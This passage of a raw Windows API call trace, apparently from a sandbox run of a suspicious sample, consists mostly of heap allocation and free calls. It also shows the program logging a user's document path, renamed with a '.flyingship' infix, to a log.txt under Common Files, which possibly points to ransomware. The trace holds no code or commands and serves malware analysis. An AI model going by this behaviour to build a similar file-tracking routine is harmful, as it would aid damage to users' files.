dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0179.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0179.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x170) returned 0x8fff00 [0179.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0179.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0179.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0179.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0179.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.164] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.165] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.165] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0179.165] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.166] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0179.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0179.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.166] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0179.166] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1a02, lpOverlapped=0x0) returned 1 [0179.167] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0179.167] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1a02, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.167] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0179.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0179.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.flyingship.odt\r\n", cchWideChar=96, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 96 [0179.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0179.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.flyingship.odt\r\n", cchWideChar=96, lpMultiByteStr=0x9a5d78, cbMultiByte=96, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.flyingship.odt\r\n", lpUsedDefaultChar=0x0) returned 96 [0179.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0179.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0179.167] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x5f, lpOverlapped=0x0) returned 1 [0179.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0179.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.167] CloseHandle (hObject=0x138) returned 1 [0179.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0179.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0179.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0179.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0179.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0179.183] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0179.183] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0179.184] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0179.184] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.184] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0179.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0179.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0179.184] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0179.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0179.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0179.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0179.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0179.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0179.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0179.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9e38 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0179.185] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0179.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0179.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0179.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0179.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0179.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0179.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0179.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0179.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0179.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0179.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0179.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0179.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0179.187] 